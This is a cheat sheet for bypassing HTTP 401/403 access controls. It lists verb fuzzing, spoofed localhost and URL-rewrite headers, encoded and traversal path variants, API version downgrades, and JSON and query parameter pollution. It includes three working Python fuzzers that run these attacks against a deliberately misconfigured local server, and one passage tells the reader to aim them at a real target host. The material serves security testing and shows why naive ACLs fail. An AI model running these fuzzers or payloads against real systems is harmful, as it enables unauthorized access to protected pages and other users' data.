401/403 Bypass

HTTP Verbs/Methods Fuzzing

Try using different verbs to access the file: GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK

  • Check the response headers. A HEAD request returns no body by definition, so a 200 to HEAD with e.g. Content-Length: 55 shows that HEAD passes the access check (and how large the protected body is) even though nothing has been exfiltrated yet; it is a strong hint to try the other verbs and method-override headers;

  • X-HTTP-Method-Override: PUT can override the verb the back-end acts on (send a permitted verb with the header set to the denied one);

  • TRACE verb to identify headers added by intermediate proxies.

HTTP Headers Fuzzing

  • Host: <arbitrary_value>

  • User-Agent: <FUZZ>

  • X-Originating-IP: 127.0.0.1

  • X-Forwarded-For: 127.0.0.1

  • X-Forwarded: 127.0.0.1

  • Forwarded-For: 127.0.0.1

  • X-Remote-IP: 127.0.0.1

  • X-Remote-Addr: 127.0.0.1

  • X-ProxyUser-Ip: 127.0.0.1

  • X-Original-URL: 127.0.0.1

  • Client-IP: 127.0.0.1

  • True-Client-IP: 127.0.0.1

  • Cluster-Client-IP: 127.0.0.1

  • Host: localhost

If the path is protected, try to bypass the path check with these headers (a front-end that evaluates the request line can be paired with a back-end that routes on the header):

  • X-Original-URL: /admin/console

  • X-Rewrite-URL: /admin/console

Also try removing the Host header entirely, or sending it with an arbitrary value.
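The verb and header checks above, as an added example that is not code from the original page. It starts a deliberately misconfigured local HTTP server whose ACL carries three constructed mistakes (it only denies GET and POST, it trusts client-supplied IP headers, and it is evaluated on the raw path while routing honours X-Original-URL), then fuzzes it the way the two sections describe; the secret string, the /admin/console path and the server itself are assumptions so that the script runs offline.

```python
"""Verb and header fuzzing against a deliberately misconfigured local
HTTP server.  Added example, not from the original page; the server's
ACL is constructed to carry the mistakes the page describes."""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

SECRET = b"admin console: flag{constructed-example}"   # constructed
IP_HEADERS = ("X-Forwarded-For", "X-Originating-IP", "X-Remote-IP",
              "True-Client-IP", "Client-IP")


class FlawedHandler(BaseHTTPRequestHandler):
    def _acl_allows(self):
        if self.command not in ("GET", "POST"):             # mistake 1: verb-specific deny
            return True
        if any(self.headers.get(h) == "127.0.0.1" for h in IP_HEADERS):
            return True                                      # mistake 2: trusts IP headers
        return not self.path.startswith("/admin")            # mistake 3: raw path, see _route

    def _route(self):
        return self.headers.get("X-Original-URL", self.path)

    def _respond(self, status, body):
        self.send_response(status)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        if self.command != "HEAD":                           # HEAD: headers only
            self.wfile.write(body)

    def _handle(self):
        if not self._acl_allows():
            return self._respond(403, b"forbidden")
        if self._route().startswith("/admin"):
            return self._respond(200, SECRET)
        return self._respond(200, b"public")

    do_GET = do_POST = do_HEAD = do_PUT = do_OPTIONS = _handle

    def log_message(self, *args):                            # keep output quiet
        pass


def start_server():
    """Bind to a free loopback port and serve in a daemon thread."""
    srv = ThreadingHTTPServer(("127.0.0.1", 0), FlawedHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def send(port, method, path, headers=None):
    """Return (status, Content-Length as int or None, body)."""
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    conn.request(method, path, headers=headers or {})
    resp = conn.getresponse()
    body = resp.read()
    conn.close()
    length = resp.getheader("Content-Length")
    return resp.status, (int(length) if length else None), body


def fuzz(port, target="/admin/console"):
    """Baseline GET, then verbs, then headers. Returns {label: (status, length)}."""
    results = {}
    for verb in ("GET", "HEAD", "POST", "PUT", "OPTIONS", "INVENTED"):
        status, length, _ = send(port, verb, target)
        results[verb] = (status, length)
    for h in IP_HEADERS:
        status, length, _ = send(port, "GET", target, {h: "127.0.0.1"})
        results[h] = (status, length)
    # the ACL sees "/", the router follows X-Original-URL
    status, length, _ = send(port, "GET", "/", {"X-Original-URL": target})
    results["X-Original-URL"] = (status, length)
    return results


if __name__ == "__main__":
    server = start_server()
    for label, (status, length) in fuzz(server.server_address[1]).items():
        print(f"{label:20s} -> {status}  Content-Length: {length}")
    server.shutdown()
```

Against a real target, point `send` at the host under test and drop the local server; the output shows exactly the signal the page asks for, a 200 to HEAD with the secret's Content-Length but an empty body, a 200 to PUT/OPTIONS, and 200s for the trusted-IP headers and for X-Original-URL sent on a public path.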

Path Fuzzing

Encoding / Traversal

  • /..%2f/path

  • /%252e%252e/path (double URL encode)

  • /%ef%bc%8fpath (Unicode slash → //path)

Case & Normalization

Request           Result
/secret           403 Forbidden
/SECRET           200 OK
/secret/          200 OK
/secret/.         200 OK
//secret//        200 OK
/./secret/..      200 OK
/;/secret         200 OK
/.;/secret        200 OK
//;//secret       200 OK
/secret.json      200 OK (common in Ruby apps)
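Why the variants in the table and the encoding/traversal forms above get through, as an added example that is not from the original page: a front-end rule that matches the literal, undecoded request-target against "/secret" is paired with a back-end that normalises before routing. Both the ACL and the normaliser are constructed models of common behaviour, not any specific product's; the generator emits the page's variants so it can also feed a real fuzz.

```python
"""Front-end literal match versus back-end normalisation.  Added example,
not from the original page; the ACL and normaliser are constructed models."""
from urllib.parse import unquote

FULLWIDTH_SOLIDUS = "\uff0f"          # what %ef%bc%8f decodes to


def naive_acl_forbids(raw_path, protected="/secret"):
    """Front-end deny rule: literal, case-sensitive, on the undecoded path."""
    return raw_path == protected


def backend_normalize(raw_path, decode_rounds=1, case_insensitive=True):
    """Model of a lenient back-end: percent-decode (once, or twice for
    double-decoding stacks), fold the fullwidth slash, drop ';' path
    parameters, and resolve '.', '..' and empty segments."""
    p = raw_path
    for _ in range(decode_rounds):
        p = unquote(p)
    p = p.replace(FULLWIDTH_SOLIDUS, "/")
    segments = []
    for seg in p.split("/"):
        seg = seg.split(";", 1)[0]        # "/;/x" and "/.;/x" collapse here
        if seg in ("", "."):
            continue
        if seg == "..":
            if segments:
                segments.pop()
            continue
        segments.append(seg)
    out = "/" + "/".join(segments)
    return out.lower() if case_insensitive else out


def mutations(path):
    """The page's variants: case, slashes, dot segments, ';', encodings."""
    name = path.strip("/")
    return [
        f"/{name.upper()}", f"/{name}/", f"/{name}/.", f"//{name}//",
        f"/./{name}/..", f"/;/{name}", f"/.;/{name}", f"//;//{name}",
        f"/{name}.json", f"/..%2f/{name}", f"/%252e%252e/{name}",
        f"/%ef%bc%8f{name}",
    ]


def find_bypasses(path, **normalize_kwargs):
    """Variants the front-end lets through that the back-end maps to `path`."""
    target = backend_normalize(path, **normalize_kwargs)
    return [m for m in mutations(path)
            if not naive_acl_forbids(m, path)
            and backend_normalize(m, **normalize_kwargs) == target]


if __name__ == "__main__":
    for m in mutations("/secret"):
        verdict = "403 (acl)" if naive_acl_forbids(m) else backend_normalize(m)
        print(f"{m:22s} -> {verdict}")
    print("bypasses:", find_bypasses("/secret"))
```

Two caveats the model makes visible: /%252e%252e/secret only works when the back-end decodes twice (`decode_rounds=2`), and /./secret/.. resolves to "/" here, so the 200 the table reports for it comes from a server that does not resolve ".." the way this model does. /secret.json is a routing (format suffix) bypass rather than a normalisation one, so it is emitted but never classified as a hit.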

Unicode Fuzzing

Use these patterns, substituting Unicode and normalization payloads for FUZZ:

  • /FUZZsecret

  • /FUZZ/secret

  • /secretFUZZ

API & JSON Bypasses

API Versions

  • If the denied endpoint is versioned, e.g. /v3/users_data/1234, try older versions:

  • /v1/users_data/1234 (older API versions are often left without the newer authorization check)

JSON Structure

  • { "id": 111 }

  • { "id": [111] }

  • { "id": { "id": 111 } }

Parameter Pollution

  • JSON: send the same key twice in one object; parsers disagree on whether the first or the last occurrence wins, so the authorization check may see one value and the handler the other.

  • URL: repeat the query parameter (id=…&id=…); back-ends differ in which copy they read.

Parameter Manipulation

  • Change values (e.g. id=123 → id=124)

  • Add params (e.g. id=124&isAdmin=true)

  • Remove params

  • Reorder params

  • Special chars

  • Boundary values (e.g. -1, 0, 99999999)
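The JSON structure, parameter pollution and parameter manipulation bullets above, as one added example that is not code from the original page. It models a front-end check that reads the first occurrence of "id" and only understands integers against a back-end that takes the last occurrence and unwraps arrays and objects, then reports which variants slip through; ALLOWED_IDS and all ids are constructed.

```python
"""Authorization discrepancies from JSON structure, duplicate keys and
parameter pollution.  Added example, not from the original page; the
front-end/back-end behaviour and all values are constructed."""
import json
from urllib.parse import parse_qsl

ALLOWED_IDS = {111}       # constructed: the caller may only read id 111


def first_wins(pairs):
    """object_pairs_hook / query parser that keeps the first duplicate."""
    d = {}
    for k, v in pairs:
        d.setdefault(k, v)
    return d


def front_end_allows(id_value):
    """Fails open on anything that is not an int: the check never
    anticipated a list, object or string and lets it through."""
    if not isinstance(id_value, int):
        return True
    return id_value in ALLOWED_IDS


def back_end_id(id_value):
    """Lenient coercion: [x] -> x, {"id": x} -> x, "222" -> 222."""
    while isinstance(id_value, (list, dict)):
        id_value = id_value[0] if isinstance(id_value, list) else id_value.get("id")
    return int(id_value)


def json_variants(key, allowed, wanted):
    return [
        json.dumps({key: wanted}),                                   # baseline
        json.dumps({key: [wanted]}),                                 # array wrap
        json.dumps({key: {key: wanted}}),                            # nested object
        '{"%s": %s, "%s": %s}' % (key, allowed, key, wanted),        # duplicate key
        json.dumps({key: str(wanted)}),                              # type change
    ]


def url_variants(key, allowed, wanted):
    return [
        f"{key}={wanted}",                    # baseline
        f"{key}={allowed}&{key}={wanted}",    # pollution: allowed first
        f"{key}={wanted}&{key}={allowed}",    # pollution: wanted first
    ]


def json_bypasses(key, allowed, wanted):
    """Bodies the front-end accepts while the back-end acts on `wanted`."""
    hits = []
    for body in json_variants(key, allowed, wanted):
        seen_by_acl = json.loads(body, object_pairs_hook=first_wins).get(key)
        seen_by_app = json.loads(body).get(key)       # json.loads: last key wins
        if front_end_allows(seen_by_acl) and back_end_id(seen_by_app) == wanted:
            hits.append(body)
    return hits


def url_bypasses(key, allowed, wanted):
    """Query strings with the same first-vs-last discrepancy."""
    hits = []
    for q in url_variants(key, allowed, wanted):
        pairs = parse_qsl(q)
        seen_by_acl = int(first_wins(pairs)[key])
        seen_by_app = int(dict(pairs)[key])            # dict(): last wins
        if front_end_allows(seen_by_acl) and seen_by_app == wanted:
            hits.append(q)
    return hits


if __name__ == "__main__":
    print("JSON:", json_bypasses("id", 111, 222))
    print("URL: ", url_bypasses("id", 111, 222))
```

The baseline {"id": 222} is correctly denied; every structural variant and the duplicate-key body get through because the check either fails open on an unexpected type or reads a different copy of the key than the handler. Python's own json.loads keeps the last duplicate key, which is what makes the duplicate-key case bite here.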

Protocol Bypasses

Change the protocol:

  • HTTP/1.1 → HTTP/1.0

  • HTTP/1.1 → HTTP/2

  • HTTP → HTTPS
